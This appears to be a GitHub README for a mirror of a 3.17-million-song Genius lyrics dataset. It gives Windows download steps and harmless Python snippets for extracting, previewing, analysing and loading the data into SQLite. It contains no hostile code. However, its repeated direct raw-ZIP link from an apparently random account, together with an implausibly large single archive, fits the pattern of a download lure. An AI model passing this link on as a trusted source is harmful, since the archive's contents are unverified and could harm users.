🎵 genius-lyrics-cleaned-dataset - Cleaned English Song Lyrics Dataset

Download Now


📄 About This Dataset

This dataset contains over 3.17 million cleaned and deduplicated English song lyrics. The data comes from Genius and includes the song title, artist, genre tag, year of release, and full lyrics for each song. It is a mirror of the dataset hosted on Hugging Face and is licensed under MIT. It is suitable for text analysis, language modeling, machine learning, and music research.

You do not need programming skills to work with this data if you only want to download and explore the contents. This guide will help you get the dataset on your Windows computer step by step.


⚙️ System Requirements

  • Windows 10 or later
  • At least 4 GB of free disk space (dataset size is roughly 800 MB compressed)
  • A modern web browser (Chrome, Edge, Firefox)
  • Optional: A CSV or JSON viewer (for exploring data files) such as Microsoft Excel or a free tool like VS Code or Notepad++

🚀 Downloading the Dataset

Click the large green button at the top or use the direct link below to visit the dataset page.

Download Dataset from GitHub

On this page, you will find the dataset files and instructions. Follow the next steps to get the dataset on your PC.


💾 How to Download and Extract the Dataset

  1. Open the link: https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip. This link points directly at a ZIP file, so your browser may start the download right away. If it does, skip to step 4.

  2. If you are on the repository page instead, look for the "Code" button near the top right of the page, and click it.

  3. In the menu that opens, select Download ZIP. This will download a file named something like genius-lyrics-cleaned-dataset-main.zip to your default download folder.

  4. After the download finishes, open your "Downloads" folder and find the ZIP file.

  5. Right-click the ZIP file and choose Extract All....

  6. In the extraction dialog, pick a location where you want the dataset files to be saved (for example, your Desktop or Documents folder). Click Extract.

  7. Once extraction is complete, you can open the folder to see the dataset files.
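
If you prefer a script to the right-click menu, the extraction step can be sketched in Python with the standard zipfile module. This is a minimal sketch, not part of the dataset: the function name extract_dataset and the folder paths are assumptions, so adjust them to match where your browser saved the file.

```python
import zipfile
from pathlib import Path


def extract_dataset(zip_path, dest_dir):
    """Extract every member of the ZIP archive into dest_dir and return the member names."""
    dest = Path(dest_dir)
    dest.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(zip_path) as archive:
        archive.extractall(dest)
        return archive.namelist()


if __name__ == "__main__":
    # Hypothetical paths: change these to match your own download and target folders.
    zip_file = Path.home() / "Downloads" / "genius-lyrics-cleaned-dataset-main.zip"
    target = Path.home() / "Documents" / "genius-lyrics"
    if zip_file.exists():
        for name in extract_dataset(zip_file, target):
            print(name)
    else:
        print(f"ZIP file not found: {zip_file}")
```

The script prints each extracted file name, which is a quick way to confirm what the archive actually contains.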


🔍 Exploring the Dataset

The dataset contains multiple files with different formats, such as CSV or JSON:

  • lyrics.csv – This file holds the core data: title, artist, genre, year, and lyrics.
  • metadata.json – Contains metadata details about the dataset.
  • README.md – Additional information from the dataset creators.

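If you want to open lyrics.csv, you can use programs like Microsoft Excel or any CSV viewer. Note that an Excel worksheet holds at most 1,048,576 rows, so if the file stores one song per row, Excel will show only part of the 3.17 million songs.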
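
To peek at the first few rows without loading the whole file, a short Python sketch using the standard csv module may help. It assumes lyrics.csv has a header row with columns named title and artist, as the file description above suggests; the exact header names are an assumption, and preview_rows is a hypothetical helper.

```python
import csv
from itertools import islice


def preview_rows(csv_path, limit=5):
    """Return the first `limit` data rows of a CSV file as dictionaries keyed by header."""
    # Lyrics fields can be long, so raise the default per-field size limit.
    csv.field_size_limit(10_000_000)
    with open(csv_path, newline="", encoding="utf-8") as handle:
        reader = csv.DictReader(handle)
        return list(islice(reader, limit))
```

For example, `for row in preview_rows("lyrics.csv"): print(row.get("title"), "by", row.get("artist"))` prints one line per song. Using `row.get` avoids an error if a column is named differently than assumed.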


🛠 Using the Dataset

You don’t need to install anything special to browse the files. Just open the CSV file to view the lyrics and information.

For more advanced uses like text processing or machine learning:

  • Consider installing software like Python and Jupyter Notebook.
  • Use libraries like pandas for handling the data.
  • Use text editors to explore raw data in JSON files.
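
As an alternative to a text editor, the JSON file can be inspected from Python. The layout of metadata.json is not documented here, so this sketch makes no assumption about its keys; it only reports what it finds at the top level. The name describe_json is a hypothetical helper.

```python
import json


def describe_json(json_path):
    """Map each top-level key to the type name of its value.

    If the root of the file is not a JSON object, describe the root itself.
    """
    with open(json_path, encoding="utf-8") as handle:
        data = json.load(handle)
    if isinstance(data, dict):
        return {key: type(value).__name__ for key, value in data.items()}
    return {"<root>": type(data).__name__}
```

Calling `describe_json("metadata.json")` gives a quick overview of the file before you decide how to read it in detail.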

The data is useful for tasks like:

  • Language analysis
  • Song lyric research
  • Training language models
  • Creating music recommendation systems
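
As a small illustration of language analysis, the sketch below counts the most common words in the lyrics column. It reads the file one row at a time, so it should not need to hold all 3.17 million songs in memory. The column name lyrics, the simple word pattern, and the top_words helper are assumptions made for illustration.

```python
import csv
import re
from collections import Counter

# Very simple tokenizer: runs of lowercase letters and apostrophes.
WORD_RE = re.compile(r"[a-z']+")


def top_words(csv_path, column="lyrics", n=10, max_rows=None):
    """Return the n most common words in one CSV column, optionally over the first max_rows rows."""
    csv.field_size_limit(10_000_000)  # lyrics fields can be long
    counts = Counter()
    with open(csv_path, newline="", encoding="utf-8") as handle:
        for index, row in enumerate(csv.DictReader(handle)):
            if max_rows is not None and index >= max_rows:
                break
            text = (row.get(column) or "").lower()
            counts.update(WORD_RE.findall(text))
    return counts.most_common(n)
```

Passing `max_rows=10000` is a reasonable way to try the function on a sample before running it over the full file.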

🧰 Additional Tools and Tips

  • If CSV files are too large for Excel, try tools like CSVed or OpenRefine.
  • To search lyrics quickly, use a text editor with "Find" functions (VS Code, Notepad++).
  • Use database software if you want to run more complex queries on the dataset.
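
One way to run more complex queries is to load the CSV into SQLite, which ships with Python. This is a sketch under assumptions: the header names in COLUMNS mirror the fields listed for lyrics.csv but have not been checked against the real file, and the table name songs and both helper functions are hypothetical.

```python
import csv
import sqlite3

# Assumed header names, taken from the description of lyrics.csv.
COLUMNS = ("title", "artist", "genre", "year", "lyrics")


def load_csv_into_sqlite(csv_path, db_path=":memory:"):
    """Copy the CSV rows into a `songs` table and return the open connection."""
    csv.field_size_limit(10_000_000)  # lyrics fields can be long
    conn = sqlite3.connect(db_path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS songs "
        "(title TEXT, artist TEXT, genre TEXT, year INTEGER, lyrics TEXT)"
    )
    with open(csv_path, newline="", encoding="utf-8") as handle:
        rows = (tuple(row.get(col) for col in COLUMNS) for row in csv.DictReader(handle))
        conn.executemany("INSERT INTO songs VALUES (?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def songs_per_genre(conn):
    """Return (genre, song count) pairs, largest genre first."""
    query = "SELECT genre, COUNT(*) FROM songs GROUP BY genre ORDER BY COUNT(*) DESC, genre"
    return conn.execute(query).fetchall()
```

For the full dataset, pass a file name such as `db_path="lyrics.db"` instead of the in-memory default so the table is stored on disk and does not need to be rebuilt each time.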

❓ Troubleshooting

  • If your download fails, check your internet connection and try again.
  • Ensure you have enough free disk space.
  • If the ZIP file fails to extract, try a different extraction tool like 7-Zip.
  • If you have trouble opening CSV files, try importing them into Excel using the import wizard.
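
Two of these checks can also be sketched in Python: the free disk space and whether the downloaded ZIP is intact. Both helpers below are hypothetical names and use only the standard library. The 4 GB figure in the usage note comes from the system requirements above.

```python
import shutil
import zipfile


def free_space_gb(path="."):
    """Return the free disk space, in GiB, on the drive that holds `path`."""
    return shutil.disk_usage(path).free / 1024**3


def first_corrupt_member(zip_path):
    """Return the name of the first archive member that fails its CRC check, or None if all pass.

    Raises zipfile.BadZipFile if the file is not a ZIP archive at all,
    which can happen when a download was interrupted.
    """
    with zipfile.ZipFile(zip_path) as archive:
        return archive.testzip()
```

For example, `if free_space_gb() < 4: print("Less than 4 GB free")` flags a low-space drive, and a non-None result or a BadZipFile error from `first_corrupt_member` suggests downloading the file again.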

📥 Download Link (Again)

Use this link to download the dataset files:

https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip

About

Provide a cleaned, filtered English lyrics dataset optimized for language model fine-tuning and music NLP research.
